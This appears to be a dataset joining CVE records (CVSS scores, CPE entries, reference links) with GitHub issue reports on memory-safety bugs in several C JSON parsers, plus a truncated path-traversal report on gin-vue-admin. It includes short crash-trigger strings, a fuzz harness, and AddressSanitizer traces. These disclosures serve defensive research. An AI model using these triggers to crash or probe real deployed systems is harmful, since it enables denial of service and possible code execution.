==2238917==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000323c at pc 0x564852e329cc bp 0x7fff7edbed90 sp 0x7fff7edbed80
READ of size 1 at 0x60200000323c thread T0
#0 0x564852e329cb in SkipString /opt1/software/MojoJson/Json.c:695
#1 0x564852e32b03 in ParseString /opt1/software/MojoJson/Json.c:719
#2 0x564852e33b76 in ParseValue /opt1/software/MojoJson/Json.c:858
#3 0x564852e34143 in Parse /opt1/software/MojoJson/Json.c:949
#4 0x564852e342ef in easyloop /opt1/software/MojoJson/test.c:8
#5 0x564852e44355 in main /opt1/software/betafuzz/srap/wrapentry.c:98
#6 0x7f587147ad8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#7 0x7f587147ae3f | heap-buffer-overflow in func SkipString | https://api.github.com/repos/scottcgi/MojoJson/issues/2/comments | 1 | 2023-01-03T15:02:31Z | 2023-01-04T06:42:25Z | https://github.com/scottcgi/MojoJson/issues/2 | 1,517,513,256 | 2 | 4,703 |
CVE-2023-23087 | 2023-02-03T18:15:17.007 | An issue was found in MojoJson v1.2.3 allows attackers to execute arbitary code via the destroy function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/scottcgi/MojoJson/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/scottcgi/MojoJson/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mojojson_project:mojojson:1.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "8E333017-5C96-4C80-8EC4-7EE492AA081B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/scottcgi/MojoJson/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"scottcgi",
"MojoJson"
] | test.c:
char* jstr = ":#@\$^\^&*^(";
JsonValue* value = AJson->Parse(jstr);
if(value != NULL)
AJson->Destroy(value);
=================================================================
==2239161==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564852e30c19 bp 0x7fff7edbef40 sp 0x7fff7edbef10 T0)
==2239161==The signal is caused by a READ memory access.
==2239161==Hint: address points to the zero page.
#0 0x564852e30c19 in Destroy /opt1/software/MojoJson/Json.c:404
#1 0x564852e30cee in Destroy /opt1/software/MojoJson/Json.c:411
#2 0x564852e34333 in easyloop /opt1/software/MojoJson/test.c:10
#3 0x564852e44355 in main /opt1/software/betafuzz/srap/wrapentry.c:98
#4 0x7f587147ad8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#5 0x7f587147ae3f in __libc_start_main_impl ../csu/libc-start.c:392
#6 0x564852e2f994 in _start (/opt1/software/MojoJson/test+0x4994) | null def in function Destory | https://api.github.com/repos/scottcgi/MojoJson/issues/3/comments | 1 | 2023-01-03T15:09:10Z | 2023-01-04T06:39:25Z | https://github.com/scottcgi/MojoJson/issues/3 | 1,517,523,043 | 3 | 4,704 |
CVE-2023-23088 | 2023-02-03T18:15:17.177 | Buffer OverFlow Vulnerability in Barenboim json-parser master and v1.1.0 fixed in v1.1.1 allows an attacker to execute arbitrary code via the json_value_parse function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Barenboim/json-parser/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Barenboim/json-parser/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json-parser_project:json-parser:1.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BD7E5576-EC1A-413A-9B54-ACC50FFA8BF2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Barenboim/json-parser/issues/7 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Barenboim",
"json-parser"
] | CC=gcc -fsanitize=address make
test.c:
char* jstr = "{ "";
json_value_t *val = json_value_parse(jstr);
use json_value_parse to parse input "{ "" will cause a heap-buffer-overflow error.
=================================================================
==2352670==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000109953 at pc 0x55900a20cc38 bp 0x7ffd112d2dc0 sp 0x7ffd112d2db0
READ of size 1 at 0x602000109953 thread T0
#0 0x55900a20cc37 in json_value_parse /opt1/software/json-parser/json_parser.c:685
#1 0x55900a213a4f in main /opt1/software/json-parser/test.c:184 | heap-buffer-overflow at json_value_parse | https://api.github.com/repos/Barenboim/json-parser/issues/7/comments | 4 | 2023-01-03T16:12:56Z | 2023-04-11T11:53:00Z | https://github.com/Barenboim/json-parser/issues/7 | 1,517,615,766 | 7 | 4,705 |
CVE-2022-45491 | 2023-02-03T21:15:09.483 | Buffer overflow vulnerability in function json_parse_value in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-55fm-gm4m-3v3j"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/sheredom/json.h/issues/94"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-55fm-gm4m-3v3j"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/sheredom/json.h/issues/94"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json.h_project:json.h:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4297B9CE-4503-4DAE-886C-FCB54417DF05",
"versionEndExcluding": "2022-11-14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/sheredom/json.h/issues/94 | [
"Third Party Advisory"
] | github.com | [
"sheredom",
"json.h"
] | # Heap Overflow in json_parse_value()
In `json_parse_value()`, there is a heap out-of-bound write. The bug can be triggered with an invocation of `json_parse_ex()` with specific flags combination. The root cause of this vulnerability is that the value transferred to `json_parse_value()` is not properly sanitized, and it is pointed to out-of-bound position.
Here is the output of Google ASAN when the vulnerability is triggerred:
```
The flags is 0x5fd6d7d6d6247b16
=================================================================
==5035==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000110 at pc 0x5615f43f0b7e bp 0x7ffc2be6fcd0 sp 0x7ffc2be6fcc8
WRITE of size 8 at 0x611000000110 thread T0
#0 0x5615f43f0b7d in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1959:19
#1 0x5615f43ef8f0 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1719:5
#2 0x5615f43f01c8 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1940:5
#3 0x5615f43f8c85 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2129:3
#4 0x5615f440f192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5
#5 0x7fee4e17bd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#6 0x7fee4e17be3f in __libc_start_main csu/../csu/libc-start.c:392:3
#7 0x5615f431d314 in _start (/home/hyrathon/Desktop/jsonh/san+0x33314) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a)
0x611000000111 is located 0 bytes to the right of 209-byte region [0x611000000040,0x611000000111)
allocated by thread T0 here:
#0 0x5615f43a015e in __interceptor_malloc (/home/hyrathon/Desktop/jsonh/san+0xb615e) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a)
#1 0x5615f43f7f15 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2088:18
#2 0x5615f440f192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5
#3 0x7fee4e17bd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hyrathon/Desktop/jsonh/./json.h:1959:19 in json_parse_value
Shadow bytes around the buggy address:
0x0c227fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff8020: 00 00[01]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5035==ABORTING
```
The input to trigger this bug is attached. The first 8 bytes are the flags for `json_parse_ex()` and the rest is the content(src). Please use address sanitizer to reproduce the bug, as non-crash overflow is hard to detect or locate without shadow memory.
Version: latest commit (bdcf2e1912aa4c0127f755f5f6271c539d6cbf9f)
[crash-input.zip](https://github.com/sheredom/json.h/files/10000500/crash-input.zip)
| Heap Overflow in json_parse_value() | https://api.github.com/repos/sheredom/json.h/issues/94/comments | 0 | 2022-11-14T07:23:35Z | 2022-11-14T16:46:31Z | https://github.com/sheredom/json.h/issues/94 | 1,447,530,332 | 94 | 4,706 |
CVE-2022-45492 | 2023-02-03T21:15:10.273 | Buffer overflow vulnerability in function json_parse_number in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-r9wh-hxqh-3xq7"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sheredom/json.h/issues/95"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-r9wh-hxqh-3xq7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sheredom/json.h/issues/95"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json.h_project:json.h:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4297B9CE-4503-4DAE-886C-FCB54417DF05",
"versionEndExcluding": "2022-11-14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/sheredom/json.h/issues/95 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"sheredom",
"json.h"
] | # Heap Overflow in json_parse_number()
In `json_parse_number()`, there is a heap out-of-bound write. The bug can be triggered with an invocation of `json_parse_ex()` with specific flags combination. The root cause of this vulnerability is that the parameter `number` transferred to `json_parse_number()` is not properly sanitized, and it is pointed to out-of-bound position assigned by upper layer function.
Here is the output of Google ASAN when the vulnerability is triggerred:
```
The flags is 0x5fd6d79cd6247bff
=================================================================
==5128==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000001c0 at pc 0x560f532c646f bp 0x7ffc97871f80 sp 0x7ffc97871f78
WRITE of size 8 at 0x6140000001c0 thread T0
#0 0x560f532c646e in json_parse_number /home/hyrathon/Desktop/jsonh/./json.h:1839:18
#1 0x560f532c22d1 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1980:7
#2 0x560f532c08f0 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1719:5
#3 0x560f532c11c8 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1940:5
#4 0x560f532c9c85 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2129:3
#5 0x560f532e0192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5
#6 0x7f65c9a20d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#7 0x7f65c9a20e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#8 0x560f531ee314 in _start (/home/hyrathon/Desktop/jsonh/san+0x33314) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a)
0x6140000001c4 is located 0 bytes to the right of 388-byte region [0x614000000040,0x6140000001c4)
allocated by thread T0 here:
#0 0x560f5327115e in __interceptor_malloc (/home/hyrathon/Desktop/jsonh/san+0xb615e) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a)
#1 0x560f532c8f15 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2088:18
#2 0x560f532e0192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5
#3 0x7f65c9a20d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hyrathon/Desktop/jsonh/./json.h:1839:18 in json_parse_number
Shadow bytes around the buggy address:
0x0c287fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c287fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c287fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c287fff8030: 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa
0x0c287fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c287fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c287fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c287fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c287fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5128==ABORTING
```
The input to trigger this bug is attached. The first 8 bytes are the flags for `json_parse_ex()` and the rest is the content(src). Please use address sanitizer to reproduce the bug, as non-crash overflow is hard to detect or locate without shadow memory.
Version: latest commit (bdcf2e1912aa4c0127f755f5f6271c539d6cbf9f)
[crash-input.zip](https://github.com/sheredom/json.h/files/10000502/crash-input.zip)
| Heap Overflow in json_parse_number() | https://api.github.com/repos/sheredom/json.h/issues/95/comments | 0 | 2022-11-14T07:24:05Z | 2022-11-14T16:46:31Z | https://github.com/sheredom/json.h/issues/95 | 1,447,530,800 | 95 | 4,707 |
CVE-2022-45496 | 2023-02-03T21:15:10.560 | Buffer overflow vulnerability in function json_parse_string in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-29hf-wrjw-2f28"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/sheredom/json.h/issues/92"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/hyrathon/trophies/security/advisories/GHSA-29hf-wrjw-2f28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/sheredom/json.h/issues/92"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json.h_project:json.h:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4297B9CE-4503-4DAE-886C-FCB54417DF05",
"versionEndExcluding": "2022-11-14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/sheredom/json.h/issues/92 | [
"Third Party Advisory"
] | github.com | [
"sheredom",
"json.h"
] | # Heap Overflow in json_parse_string()
In `json_parse_string()`, there is a heap out-of-bound write. The bug can be triggered with an invocation of `json_parse_ex()` with specific flags combination. The root cause of the vulnerability is when copy from `src` to `data`, the length of `data`(state.data_size) is not taken consideration of. Here is the output of Google ASAN when the vulnerability is triggerred:
```
The flags is 0x5fd6d7d6d6247bff
=================================================================
==4928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000189 at pc 0x55b62d1096ee bp 0x7ffdc2d4b010 sp 0x7ffdc2d4b008
WRITE of size 1 at 0x613000000189 thread T0
#0 0x55b62d1096ed in json_parse_string /home/hyrathon/Desktop/jsonh/./json.h:1540:29
#1 0x55b62d10d6db in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1949:7
#2 0x55b62d10c8f0 in json_parse_object /home/hyrathon/Desktop/jsonh/./json.h:1719:5
#3 0x55b62d10d1c8 in json_parse_value /home/hyrathon/Desktop/jsonh/./json.h:1940:5
#4 0x55b62d115c85 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2129:3
#5 0x55b62d12c192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5
#6 0x7fb9e4174d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#7 0x7fb9e4174e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#8 0x55b62d03a314 in _start (/home/hyrathon/Desktop/jsonh/san+0x33314) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a)
0x613000000189 is located 0 bytes to the right of 329-byte region [0x613000000040,0x613000000189)
allocated by thread T0 here:
#0 0x55b62d0bd15e in __interceptor_malloc (/home/hyrathon/Desktop/jsonh/san+0xb615e) (BuildId: a0e983e1c9c38a8763824dc5481f79d22fe8c82a)
#1 0x55b62d114f15 in json_parse_ex /home/hyrathon/Desktop/jsonh/./json.h:2088:18
#2 0x55b62d12c192 in main /home/hyrathon/Desktop/jsonh/fuzz.c:29:5
#3 0x7fb9e4174d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hyrathon/Desktop/jsonh/./json.h:1540:29 in json_parse_string
Shadow bytes around the buggy address:
0x0c267fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c267fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c267fff8030: 00[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4928==ABORTING
```
And the backtrace info from gdb:
```
#0 json_parse_string (state=0x7fffffffc700, string=0x613000000158) at ./json.h:1540
#1 0x000055555565a6dc in json_parse_value (state=0x7fffffffc700, is_global_object=0, value=0x613000000130) at ./json.h:1949
#2 0x00005555556598f1 in json_parse_object (state=0x7fffffffc700, is_global_object=1, object=0x613000000068) at ./json.h:1719
#3 0x000055555565a1c9 in json_parse_value (state=0x7fffffffc700, is_global_object=4, value=0x613000000040) at ./json.h:1940
#4 0x0000555555662c86 in json_parse_ex (src=0x7fffffffcb48, src_size=35, flags_bitset=6905944396334922751, alloc_func_ptr=0x0, user_data=0x0, result=0x7fffffffdbc0) at ./json.h:2129
#5 0x0000555555679193 in main (argc=2, argv=0x7fffffffde08) at fuzz.c:29
#6 0x00007ffff7ca3d90 in __libc_start_call_main (main=main@entry=0x555555678e30 <main>, argc=argc@entry=2, argv=argv@entry=0x7fffffffde08) at ../sysdeps/nptl/libc_start_call_main.h:58
#7 0x00007ffff7ca3e40 in __libc_start_main_impl (main=0x555555678e30 <main>, argc=2, argv=0x7fffffffde08, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffddf8) at ../csu/libc-start.c:392
#8 0x0000555555587315 in _start ()
```
The input to trigger this bug is attached. The first 8 bytes are the flags for `json_parse_ex()` and the rest is the content(src). Please use address sanitizer to reproduce the bug, as non-crash overflow is hard to detect or locate without shadow memory.
Version: latest commit (bdcf2e1912aa4c0127f755f5f6271c539d6cbf9f)
Also, you can always use the code below to reproduce the vulnerabilities I reported(and I won't attach it in each report for simplicity:
```c
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include "json.h"
#define BUFF_SIZE 0x1000
int main(int argc, char** argv){
if(argc != 2){
printf("Wrong number of arguments\n");
exit(0);
}
char data[BUFF_SIZE];
FILE *f = fopen(argv[1], "r");
size_t size = fread(data, 1, BUFF_SIZE, f);
if(size < sizeof(size_t)){
// to short input, exit
exit(0);
}
size_t flags = *((size_t *)data);
printf("The flags is 0x%zx\n", flags);
struct json_parse_result_s result;
json_parse_ex(data + sizeof(size_t), size - sizeof(size_t), flags, NULL, NULL, &result);
}
```
`clang fuzz.c -o san -O0 -g -fsanitize=address,undefined`
[crash-input.zip](https://github.com/sheredom/json.h/files/10000495/crash-input.zip)
| Heap Overflow in json_parse_string() | https://api.github.com/repos/sheredom/json.h/issues/92/comments | 2 | 2022-11-14T07:22:23Z | 2022-11-15T01:19:32Z | https://github.com/sheredom/json.h/issues/92 | 1,447,529,105 | 92 | 4,708 |
CVE-2022-47762 | 2023-02-03T21:15:10.797 | In gin-vue-admin < 2.5.5, the download module has a Path Traversal vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flipped-aurora/gin-vue-admin/issues/1309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/flipped-aurora/gin-vue-admin/issues/1309"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gin-vue-admin_project:gin-vue-admin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C82CAE1B-EDFC-40F7-B832-FF3C16E78F7D",
"versionEndExcluding": "2.5.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/flipped-aurora/gin-vue-admin/issues/1309 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"flipped-aurora",
"gin-vue-admin"
] | ### gin-vue-admin 版本
v2.5.4b
### Node 版本
v19.2.0
### Golang 版本
go1.19.3 darwin/arm64
### 是否依旧存在
可以
### bug描述
I've already send an email to security mail but there is no response, so I report a bug!
I found a security vulnerability like https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-32gq-gj42-mw43 .
I found the bug is closed : https://github.com/flipped-aurora/gin-vue-admin/issues/1002 。
But there are following problems here:
<img width="1360" alt="image" src="https://user-images.githubusercontent.com/4847400/206956595-f8b16a80-dfdf-47b8-a1b6-fab7fadc1aed.png">
1. The place where the problem is found is: downloadTemplate interface;
